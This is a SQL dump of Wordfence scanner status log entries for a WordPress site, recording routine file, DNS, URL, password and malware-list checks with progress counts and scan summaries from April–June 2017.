(117360, 1491943533.524607, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117361, 1491943533.741929, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117362, 1491943534.006668, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(117051, 1491750768.292755, 2, 'info', 'Done examining URls'),
(117050, 1491750768.292253, 2, 'info', 'Done host key check.'),
(117629, 1492072411.242623, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117627, 1492072410.916567, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117628, 1492072411.120302, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(118216, 1492320260.816880, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(118215, 1492320260.816320, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(118213, 1492320260.808762, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(118214, 1492320260.815851, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(118217, 1492320260.818970, 10, 'info', 'SUM_ENDOK:Scanning DNS for unauthorized changes'),
(118218, 1492320260.822994, 10, 'info', 'SUM_START:Scanning to check available disk space'),
(118219, 1492320260.825281, 10, 'info', 'SUM_ENDOK:Scanning to check available disk space'),
(118220, 1492320260.829670, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(117328, 1491886415.734967, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117783, 1492108252.953006, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117105, 1491767399.637406, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117967, 1492280410.042553, 10, 'info', 'SUM_ENDOK:Scanning your site for the HeartBleed vulnerability'),
(117517, 1492058757.726243, 1, 'info', 'Scheduled Wordfence scan starting at Thursday 13th of April 2017 04:45:57 AM'),
(117248, 1491821944.013237, 1, 'info', '-------------------'),
(117637, 1492072412.604319, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117636, 1492072412.422741, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117249, 1491821944.013644, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 44382 records in 34 seconds.'),
(117251, 1491821944.024332, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117061, 1491750769.524373, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117020, 1491750756.264262, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117484, 1491988778.459447, 2, 'info', 'Done host key check.'),
(117485, 1491988778.460677, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117170, 1491821920.355384, 1, 'info', 'Contacting Wordfence to initiate scan'),
(118064, 1492290928.458440, 10, 'info', 'SUM_START:Fetching list of known malware files from Wordfence'),
(117966, 1492280406.732403, 10, 'info', 'SUM_START:Scanning your site for the HeartBleed vulnerability'),
(117486, 1491988779.327511, 2, 'info', 'Done URL check.'),
(117872, 1492193133.881781, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117737, 1492108243.985362, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117736, 1492108243.707650, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(117735, 1492108243.325020, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117734, 1492108243.002350, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117733, 1492108242.538766, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117336, 1491886416.197002, 1, 'info', '-------------------'),
(117171, 1491821921.208183, 2, 'info', 'Getting plugin list from WordPress'),
(117746, 1492108247.380509, 2, 'info', 'Scanned contents of 37 additional files at 18.08 per second'),
(117595, 1492058791.427860, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117594, 1492058791.427471, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117593, 1492058791.420475, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117592, 1492058791.418651, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117130, 1491767411.803117, 2, 'info', 'Done host key check.'),
(117129, 1491767410.905803, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117128, 1491767410.904724, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117127, 1491767410.904217, 2, 'info', 'Scanned contents of 86 additional files at 25.27 per second'),
(117126, 1491767410.627054, 2, 'info', 'Scanned contents of 65 additional files at 20.80 per second'),
(117125, 1491767409.618263, 2, 'info', 'Scanned contents of 37 additional files at 17.48 per second'),
(117123, 1491767407.501026, 2, 'info', 'Starting scan of file contents'),
(117124, 1491767408.569841, 2, 'info', 'Scanned contents of 27 additional files at 25.28 per second'),
(117873, 1492265511.395840, 1, 'info', 'Scheduled Wordfence scan starting at Saturday 15th of April 2017 02:11:51 PM'),
(117394, 1491943543.904454, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117022, 1491750757.329976, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117023, 1491750757.935509, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117883, 1492265523.321940, 2, 'info', 'Getting theme list from WordPress'),
(117882, 1492265523.315458, 2, 'info', 'Found 14 plugins'),
(117881, 1492265523.182227, 2, 'info', 'Getting plugin list from WordPress'),
(117301, 1491886408.760156, 2, 'info', 'Starting scan of file contents'),
(117302, 1491886409.885043, 2, 'info', 'Scanned contents of 28 additional files at 24.90 per second'),
(117242, 1491821943.389909, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117643, 1492072414.029298, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117240, 1491821943.388706, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117241, 1491821943.389393, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117466, 1491988771.792907, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117467, 1491988772.195625, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(116985, 1491702321.878463, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(116986, 1491750737.862409, 1, 'info', 'Scheduled Wordfence scan starting at Sunday 9th of April 2017 03:12:17 PM'),
(117389, 1491943540.937646, 2, 'info', 'Starting scan of file contents'),
(117692, 1492072423.952370, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 44034 records in 26 seconds.'),
(117961, 1492280399.891686, 1, 'info', 'Scheduled Wordfence scan starting at Saturday 15th of April 2017 06:19:59 PM'),
(117691, 1492072423.951633, 1, 'info', '-------------------'),
(118063, 1492290928.454161, 10, 'info', 'SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),
(117964, 1492280402.714121, 10, 'info', 'SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),
(117962, 1492280400.703725, 10, 'info', 'SUM_PREP:Preparing a new scan.'),
(117963, 1492280400.713547, 10, 'info', 'SUM_PAIDONLY:Remote scan of public facing site only available to paid members'),
(118110, 1492290940.528449, 10, 'info', 'SUM_ENDOK:Scanning files for URLs in Google\'s Safe Browsing List'),
(118105, 1492290939.650664, 2, 'info', 'Done host key check.'),
(118106, 1492290939.652107, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(118107, 1492290940.498560, 2, 'info', 'Done URL check.'),
(118108, 1492290940.523701, 2, 'info', 'Done file contents scan'),
(118109, 1492290940.524867, 10, 'info', 'SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),
(117007, 1491750752.976021, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(118111, 1492290940.533902, 10, 'info', 'SUM_START:Scanning posts for URL\'s in Google\'s Safe Browsing List'),
(118112, 1492290940.569567, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117827, 1492193125.165374, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(117826, 1492193124.940903, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117988, 1492280416.799039, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far');
INSERT INTO `www2_wfStatus` (`id`, `ctime`, `level`, `type`, `msg`) VALUES
(118053, 1492290917.292862, 10, 'info', 'SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),
(118052, 1492290915.292044, 10, 'info', 'SUM_PAIDONLY:Remote scan of public facing site only available to paid members'),
(118051, 1492290915.280049, 10, 'info', 'SUM_PREP:Preparing a new scan.'),
(118045, 1492280433.227613, 10, 'info', 'SUM_ENDBAD:Scanning for old themes, plugins and core files'),
(118046, 1492280433.390833, 1, 'info', '-------------------'),
(118047, 1492280433.391432, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 44405 records in 33 seconds.'),
(118048, 1492280433.392045, 10, 'info', 'SUM_FINAL:Scan complete. You have 6 new issues to fix. See below.'),
(118049, 1492280433.397104, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(118050, 1492290914.657453, 1, 'info', 'Scheduled Wordfence scan starting at Saturday 15th of April 2017 09:15:14 PM'),
(117729, 1492108239.315303, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117728, 1492108239.007580, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117727, 1492108238.644110, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117726, 1492108237.809250, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117347, 1491943529.320003, 1, 'info', 'Contacting Wordfence to initiate scan'),
(117348, 1491943530.168182, 2, 'info', 'Getting plugin list from WordPress'),
(117349, 1491943530.188059, 2, 'info', 'Found 14 plugins'),
(117350, 1491943530.191121, 2, 'info', 'Getting theme list from WordPress'),
(117351, 1491943530.224475, 2, 'info', 'Found 4 themes'),
(117725, 1492108237.226177, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117720, 1492108235.216785, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117721, 1492108235.546115, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117722, 1492108236.118559, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117723, 1492108236.659095, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117724, 1492108236.828102, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117928, 1492265541.054550, 2, 'info', 'Done host key check.'),
(117927, 1492265540.183698, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117926, 1492265540.182679, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117290, 1491886406.225370, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117925, 1492265540.182239, 2, 'info', 'Scanned contents of 86 additional files at 27.39 per second'),
(117616, 1492072407.479072, 2, 'info', 'Getting theme list from WordPress'),
(117382, 1491943539.790269, 2, 'info', 'Analyzed 2300 files containing 34.89 MB of data so far'),
(117614, 1492072407.463338, 2, 'info', 'Getting plugin list from WordPress'),
(117615, 1492072407.475657, 2, 'info', 'Found 14 plugins'),
(117732, 1492108241.311849, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117339, 1491886416.202719, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117397, 1491943545.611815, 2, 'info', 'Done URL check.'),
(117398, 1491943545.630153, 2, 'info', 'Done file contents scan'),
(117396, 1491943544.768045, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117019, 1491750756.080231, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117018, 1491750755.649749, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117138, 1491767412.771382, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117137, 1491767412.770301, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117581, 1492058789.163767, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117582, 1492058790.034789, 2, 'info', 'Done host key check.'),
(117583, 1492058790.035270, 2, 'info', 'Done examining URls'),
(117330, 1491886415.735703, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117781, 1492108252.947596, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 43987 records in 34 seconds.'),
(117110, 1491767401.295601, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117638, 1492072413.054638, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117639, 1492072413.181430, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117640, 1492072413.301697, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(118237, 1497408788.236219, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117641, 1492072413.473093, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117642, 1492072413.633690, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(118116, 1492290941.428297, 10, 'info', 'SUM_ENDOK:Scanning posts for URL\'s in Google\'s Safe Browsing List'),
(118113, 1492290940.570501, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(118114, 1492290941.405551, 2, 'info', 'Done host key check.'),
(118115, 1492290941.406196, 2, 'info', 'Done examining URls'),
(117187, 1491821925.997214, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117188, 1491821926.331403, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117631, 1492072411.549027, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117630, 1492072411.412284, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117468, 1491988772.455773, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117469, 1491988772.932955, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(117470, 1491988773.197536, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117471, 1491988773.498620, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(117472, 1491988773.557609, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117807, 1492193116.818908, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117806, 1492193116.603433, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(118233, 1495637412.343315, 2, 'info', 'Checking 5 host keys against Wordfence scanning servers.'),
(118234, 1496619829.233228, 2, 'info', 'Scanning comment with Author: Sarah Hughes Email: lnuawlisx@jdiszkxd.com Source IP: 209.197.6.138 '),
(118235, 1496619829.303494, 2, 'info', 'Checking 4 host keys against Wordfence scanning servers.'),
(117436, 1491988758.152260, 2, 'info', 'Getting plugin list from WordPress'),
(117435, 1491988757.314840, 1, 'info', 'Contacting Wordfence to initiate scan'),
(118142, 1492320235.522892, 10, 'info', 'SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),
(118143, 1492320237.532633, 10, 'info', 'SUM_START:Scanning your site for the HeartBleed vulnerability'),
(118144, 1492320241.235454, 10, 'info', 'SUM_ENDOK:Scanning your site for the HeartBleed vulnerability'),
(118145, 1492320241.238419, 1, 'info', 'Contacting Wordfence to initiate scan'),
(116995, 1491750749.411424, 2, 'info', 'Found 14 plugins'),
(117437, 1491988758.179815, 2, 'info', 'Found 14 plugins'),
(116996, 1491750749.419369, 2, 'info', 'Getting theme list from WordPress'),
(117817, 1492193120.502563, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117818, 1492193120.688105, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117439, 1491988758.225525, 2, 'info', 'Found 4 themes'),
(117438, 1491988758.184800, 2, 'info', 'Getting theme list from WordPress'),
(117745, 1492108246.345004, 2, 'info', 'Scanned contents of 27 additional files at 26.69 per second'),
(117813, 1492193118.808720, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117814, 1492193119.117051, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117153, 1491767415.058257, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117152, 1491767415.057800, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117151, 1491767415.057255, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117314, 1491886413.641605, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117315, 1491886413.643619, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117316, 1491886414.479449, 2, 'info', 'Done host key check.'),
(117317, 1491886414.480288, 2, 'info', 'Done examining URls'),
(117322, 1491886414.566322, 2, 'info', 'Starting password strength check on 3 users.'),
(117739, 1492108244.431033, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117738, 1492108244.375951, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(117325, 1491886415.723970, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(117326, 1491886415.724786, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117327, 1491886415.726248, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117073, 1491750769.612638, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117015, 1491750754.836389, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117014, 1491750754.678042, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117329, 1491886415.735389, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117017, 1491750755.304840, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117016, 1491750755.088382, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117835, 1492193128.215132, 2, 'info', 'Scanned contents of 39 additional files at 18.42 per second'),
(117834, 1492193127.213893, 2, 'info', 'Scanned contents of 28 additional files at 25.09 per second'),
(117833, 1492193126.097107, 2, 'info', 'Starting scan of file contents'),
(117118, 1491767406.563189, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117117, 1491767406.457467, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(117116, 1491767405.956045, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117115, 1491767405.502892, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(117111, 1491767402.566552, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117112, 1491767403.882540, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117113, 1491767404.349534, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117114, 1491767404.965662, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117481, 1491988777.612263, 2, 'info', 'Scanned contents of 86 additional files at 27.60 per second'),
(116997, 1491750749.489993, 2, 'info', 'Found 4 themes'),
(117427, 1491943547.796152, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117380, 1491943539.286604, 2, 'info', 'Analyzed 2100 files containing 33.39 MB of data so far'),
(117973, 1492280410.980024, 10, 'info', 'SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),
(117379, 1491943539.059294, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117681, 1492072423.827095, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117971, 1492280410.958729, 2, 'info', 'Getting theme list from WordPress'),
(117972, 1492280410.960949, 2, 'info', 'Found 4 themes'),
(117970, 1492280410.953797, 2, 'info', 'Found 14 plugins'),
(117677, 1492072422.657611, 2, 'info', 'Starting password strength check on 3 users.'),
(117969, 1492280410.923591, 2, 'info', 'Getting plugin list from WordPress'),
(117968, 1492280410.048818, 1, 'info', 'Contacting Wordfence to initiate scan'),
(117680, 1492072423.825910, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(118207, 1492320259.647722, 10, 'info', 'SUM_START:Scanning for weak passwords'),
(118206, 1492320259.643344, 10, 'info', 'SUM_ENDOK:Scanning comments for URL\'s in Google\'s Safe Browsing List'),
(117131, 1491767411.804259, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117393, 1491943543.903259, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117392, 1491943543.902830, 2, 'info', 'Scanned contents of 85 additional files at 28.67 per second'),
(117234, 1491821942.246630, 2, 'info', 'Starting password strength check on 3 users.'),
(117670, 1492072421.443399, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117671, 1492072422.563726, 2, 'info', 'Done host key check.'),
(117672, 1492072422.564498, 2, 'info', 'Done examining URls'),
(117974, 1492280412.466574, 10, 'info', 'SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),
(117203, 1491821933.730908, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117201, 1491821933.146682, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117202, 1491821933.474340, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117459, 1491988766.982472, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117458, 1491988766.401645, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117457, 1491988765.819099, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117456, 1491988765.578446, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117455, 1491988764.924772, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117454, 1491988764.314949, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117453, 1491988763.933457, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117449, 1491988761.975355, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117450, 1491988762.464391, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(117451, 1491988763.127799, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117452, 1491988763.547743, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117060, 1491750769.513627, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117719, 1492108234.947492, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117059, 1491750769.512768, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(118043, 1492280433.200624, 10, 'info', 'SUM_ENDOK:Scanning to check available disk space'),
(118099, 1492290935.748904, 2, 'info', 'Starting scan of file contents'),
(118100, 1492290936.816577, 2, 'info', 'Scanned contents of 28 additional files at 26.24 per second'),
(118101, 1492290937.826494, 2, 'info', 'Scanned contents of 40 additional files at 19.26 per second'),
(118102, 1492290938.772616, 2, 'info', 'Scanned contents of 86 additional files at 28.45 per second'),
(117634, 1492072412.103961, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(118093, 1492290934.774034, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(117071, 1491750769.608178, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 44134 records in 30 seconds.'),
(118165, 1492320247.688144, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(118166, 1492320248.049489, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117030, 1491750761.718118, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(118169, 1492320248.941566, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(118170, 1492320249.322930, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117859, 1492193133.303087, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117860, 1492193133.304871, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117861, 1492193133.318723, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117862, 1492193133.319264, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117858, 1492193133.302140, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(117574, 1492058788.232664, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117573, 1492058788.231364, 2, 'info', 'Done host key check.'),
(117570, 1492058787.350698, 2, 'info', 'Scanned contents of 86 additional files at 25.72 per second'),
(117571, 1492058787.352420, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117572, 1492058787.354560, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117863, 1492193133.319704, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117140, 1491767413.628174, 2, 'info', 'Done examining URls'),
(117139, 1491767413.626814, 2, 'info', 'Done host key check.'),
(117029, 1491750761.689965, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(117644, 1492072414.450618, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117646, 1492072414.829213, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117645, 1492072414.680662, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117238, 1491821943.371512, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117239, 1491821943.375788, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(118139, 1492320231.488632, 10, 'info', 'SUM_PREP:Preparing a new scan.'),
(118140, 1492320231.519292, 10, 'info', 'SUM_PAIDONLY:Remote scan of public facing site only available to paid members'),
(117958, 1492265544.757927, 1, 'info', 'Scan Complete. Scanned 2413 files, 14 plugins, 4 themes, 11 pages, 145 comments and 44538 records in 32 seconds.'),
(118226, 1493013113.072155, 2, 'info', 'Scanning comment with Author: Elisa Brown Email: leyswgiuz@mrflazu.com Source IP: 81.171.97.125 '),
(117957, 1492265544.757502, 1, 'info', '-------------------'),
(117189, 1491821926.721731, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117190, 1491821927.140517, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117191, 1491821927.485144, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117192, 1491821927.684650, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117959, 1492265544.758313, 10, 'info', 'SUM_FINAL:Scan complete. You have 6 new issues to fix. See below.'),
(117960, 1492265544.762000, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117605, 1492058791.954996, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117606, 1492072396.633690, 1, 'info', 'Scheduled Wordfence scan starting at Thursday 13th of April 2017 08:33:16 AM'),
(118009, 1492280425.125035, 10, 'info', 'SUM_START:Scanning files for URLs in Google\'s Safe Browsing List'),
(118008, 1492280425.121561, 10, 'info', 'SUM_START:Scanning file contents for infections and vulnerabilities'),
(118007, 1492280425.093286, 10, 'info', 'SUM_ENDOK:Scanning for known malware files'),
(117163, 1491821909.618642, 1, 'info', 'Scheduled Wordfence scan starting at Monday 10th of April 2017 10:58:29 AM'),
(118056, 1492290925.037123, 10, 'info', 'SUM_ENDOK:Scanning your site for the HeartBleed vulnerability'),
(118055, 1492290921.304414, 10, 'info', 'SUM_START:Scanning your site for the HeartBleed vulnerability'),
(117480, 1491988777.609725, 2, 'info', 'Scanned contents of 86 additional files at 27.62 per second'),
(118031, 1492280432.112221, 10, 'info', 'SUM_START:Scanning for weak passwords'),
(118032, 1492280432.115079, 2, 'info', 'Starting password strength check on 3 users.'),
(117561, 1492058783.079761, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117479, 1491988776.584893, 2, 'info', 'Scanned contents of 39 additional files at 18.67 per second'),
(117477, 1491988774.494882, 2, 'info', 'Starting scan of file contents'),
(117478, 1491988775.547296, 2, 'info', 'Scanned contents of 28 additional files at 26.64 per second'),
(116982, 1491702321.868214, 1, 'info', '-------------------'),
(116983, 1491702321.869144, 1, 'info', 'Scan Complete. Scanned 2413 files, 14 plugins, 4 themes, 11 pages, 145 comments and 43862 records in 34 seconds.'),
(117252, 1491886383.194369, 1, 'info', 'Scheduled Wordfence scan starting at Tuesday 11th of April 2017 04:53:03 AM'),
(116971, 1491702321.301605, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(116972, 1491702321.302322, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(116973, 1491702321.306007, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(116974, 1491702321.313586, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(116975, 1491702321.314284, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(116976, 1491702321.314763, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117772, 1492108252.880536, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117773, 1492108252.881029, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117774, 1492108252.881406, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117836, 1492193129.267133, 2, 'info', 'Scanned contents of 86 additional files at 27.14 per second'),
